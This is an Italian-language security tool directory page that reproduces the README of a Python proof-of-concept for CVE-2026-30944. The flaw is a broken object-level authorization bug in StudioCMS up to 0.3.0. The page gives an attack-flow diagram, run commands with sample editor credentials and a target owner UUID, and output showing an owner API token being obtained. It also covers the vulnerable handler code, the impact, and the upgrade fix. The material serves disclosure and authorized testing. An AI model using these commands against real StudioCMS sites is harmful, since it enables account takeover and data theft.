Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-30944-PoC — Proof-of-concept in Python per CVE-2026-30944, che sfrutta una vulnerabilità BOLA in StudioCMS per elevare i privilegi tramite una generazione non sicura di token API. | Kitploit
Strumenti/GitHubGitHub/filipegaudard/cve-2026-30944-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebTest di Sicurezza delle APISicurezza WebPenetration Testing
GitHubfilipegaudard/cve-2026-30944-poc

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-30944-PoC

Proof-of-concept in Python per CVE-2026-30944, che sfrutta una vulnerabilità BOLA in StudioCMS per elevare i privilegi tramite una generazione non sicura di token API.

Vedi Repository
5 mesi faNon ancora revisionato

🔓 CVE-2026-30944

Escalata di Privilegi in StudioCMS tramite Generazione Non Sicura di Token API

CVE CVSS CWE Type

NVD • Advisory • CWE-639


Panoramica

L'endpoint POST /studiocms_api/dashboard/api-tokens in StudioCMS ≤ 0.3.0 consente a qualsiasi utente autenticato (con ruolo minimo Editor) di generare token API per qualsiasi altro utente, inclusi gli account owner e admin.

L'endpoint accetta un parametro user nel corpo della richiesta che specifica l'UUID dell'utente target ma non valida mai se l'utente richiedente è autorizzato a creare token per conto di quel target. Questa è una classica vulnerabilità di Broken Object Level Authorization (BOLA) che porta a una completa escalation di privilegi.

Flusso dell'Attacco

root@kitploit:~
┌──────────────┐     POST /api-tokens      ┌──────────────┐
│              │    {"user":"<owner-id>"}    │              │
│   Attaccante │ ─────────────────────────► │  StudioCMS   │
│   (Editor)   │                            │   Server     │
│              │ ◄───────────────────────── │              │
└──────────────┘    {"token":"eyJhb..."}    └──────────────┘
       │                                           │
       │         GET /rest/v1/users                │
       │   Authorization: Bearer <owner-token>     │
       │ ─────────────────────────────────────────►│
       │                                           │
       │ ◄─────────────────────────────────────────│
       │         [Dati utente completi come Owner] │
       │                                           │

Dettagli della Vulnerabilità


Contenuti

FileDescrizione
cve_2026_30944_poc.pyScript di sfruttamento in Python con modalità manuale e automatizzata
README.mdQuesto file
LICENSELicenza MIT

Prerequisiti

  • StudioCMS ≤ 0.3.0 (versione vulnerabile)
  • Python 3.8+
  • Credenziali valide per almeno un account Editor
root@kitploit:~
pip install requests colorama

Avvio Rapido

Sfruttamento Manuale

root@kitploit:~
# Genera un token API per l'owner usando un account editor
python3 cve_2026_30944_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --uuid 2450bf33-0135-4142-80be-9854f9a5e9f1

# Salva i risultati in JSON
python3 cve_2026_30944_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --save

Test Automatizzato

root@kitploit:~
# Test con più ruoli per confermare la vulnerabilità
python3 cve_2026_30944_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --editor-user editor01 \
  --editor-pass editorpass \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --uuid 2450bf33-0135-4142-80be-9854f9a5e9f1

Argomenti

Obbligatori

ArgomentoDescrizione
-u, --urlURL di base del target StudioCMS
--uuidUUID dell'utente target (es. account owner)

Modalità Manuale

ArgomentoDescrizione
--usernameNome utente per l'autenticazione
--passwordPassword per l'autenticazione

Modalità Test Automatizzato

Opzionali

ArgomentoDescrizione
--saveSalva i risultati in un file JSON
--no-ssl-verifyDisabilita la verifica del certificato SSL

Esempio di Output

Sistema Vulnerabile

root@kitploit:~
  ──────────────────────────────────────────────────────────
  FASE 1: Autenticazione
  ──────────────────────────────────────────────────────────
  [+] Autenticato come 'editor01'
  [*] Utente sessione: editor01 (editor)
  [*] UUID sessione: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c

  ──────────────────────────────────────────────────────────
  FASE 2: Escalata di Privilegi
  ──────────────────────────────────────────────────────────
  [*] UUID target: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] Generazione token API per l'utente target...
  [+] Token API generato con successo!
  [!] Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2...

  ──────────────────────────────────────────────────────────
  FASE 3: Verifica
  ──────────────────────────────────────────────────────────
  [*] Verifica dell'accesso token sull'API REST...
  [+] VULNERABILITÀ CONFERMATA — Accesso API completo ottenuto!
  [*] Recuperati 9 record utente

Sistema Corretto

root@kitploit:~
  ──────────────────────────────────────────────────────────
  FASE 2: Escalata di Privilegi
  ──────────────────────────────────────────────────────────
  [*] UUID target: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] Generazione token API per l'utente target...
  [*] Accesso negato (403 Forbidden) — l'endpoint potrebbe essere corretto
  [-] Sfruttamento fallito — token non generato

Causa Radice

L'handler vulnerabile in packages/studiocms/frontend/pages/studiocms_api/dashboard/api-tokens.ts (righe 16–57) accetta un parametro user dal corpo JSON e lo passa direttamente alla funzione di generazione token senza controlli di autorizzazione:

root@kitploit:~
// [1] Controlla solo se il chiamante è editor — non PER CHI sta creando il token
const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isEditor;

// [2] 'user' dal corpo della richiesta — nessuna validazione rispetto alla sessione autenticata
const jsonData = yield* readAPIContextJson<{ description: string; user: string }>(ctx);

// [3] Passato direttamente alla generazione del token — IDOR
const newToken = yield* sdk.REST_API.tokens.new(jsonData.user, jsonData.description);

Il modello di autorizzazione verifica solo "il chiamante è almeno un editor?" invece di "il chiamante è autorizzato a creare un token per questo specifico utente?"


Impatto

  • Escalata di Privilegi — Qualsiasi editor può ottenere accesso API a livello owner
  • Accesso API Completo — Il token generato concede accesso illimitato a tutti gli endpoint REST
  • Account Takeover — L'attaccante può impersonare qualsiasi utente specificandone l'UUID
  • Violazione dei Dati — Accesso a elenchi utenti, contenuti e configurazione di sistema

Mitigazione

Aggiorna StudioCMS alla versione 0.4.0 o successiva:

root@kitploit:~
npm install studiocms@latest

Disclaimer Legale

Questo strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.

  • Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta
  • L'accesso non autorizzato a sistemi informatici è illegale nella maggior parte delle giurisdizioni
  • L'autore non si assume alcuna responsabilità per l'uso improprio di questo strumento
  • Segui sempre le pratiche di divulgazione responsabile

Riferimenti

  • CVE: CVE-2026-30944
  • Advisory: GHSA-667w-mmh7-mrr4
  • CWE: CWE-639 — Bypass dell'Autorizzazione tramite Chiave Controllata dall'Utente
  • OWASP: API1:2023 — Broken Object Level Authorization
  • MITRE ATT&CK: T1134 — Manipolazione dei Token di Accesso

Autore

Filipe Gaudard


Licenza

Questo PoC è rilasciato sotto la Licenza MIT a scopo educativo. Usalo in modo responsabile ed etico.

Scarica lo strumento
CampoValore
CVECVE-2026-30944
GHSAGHSA-667w-mmh7-mrr4
CVSS v3.18.8 (Alta) — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWECWE-639: Bypass dell'Autorizzazione tramite Chiave Controllata dall'Utente
CWE (secondaria)CWE-863: Autorizzazione Errata
MITRE ATT&CKT1134 — Manipolazione dei Token di Accesso
OWASP APIAPI1:2023 — Broken Object Level Authorization
Versioni Affettestudiocms ≤ 0.3.0
Corretta instudiocms 0.4.0
ArgomentoDescrizione
--auto-testAbilita il test automatizzato multi-ruolo
--editor-userNome utente dell'account editor
--editor-passPassword dell'account editor
--visitor-userNome utente dell'account visitor
--visitor-passPassword dell'account visitor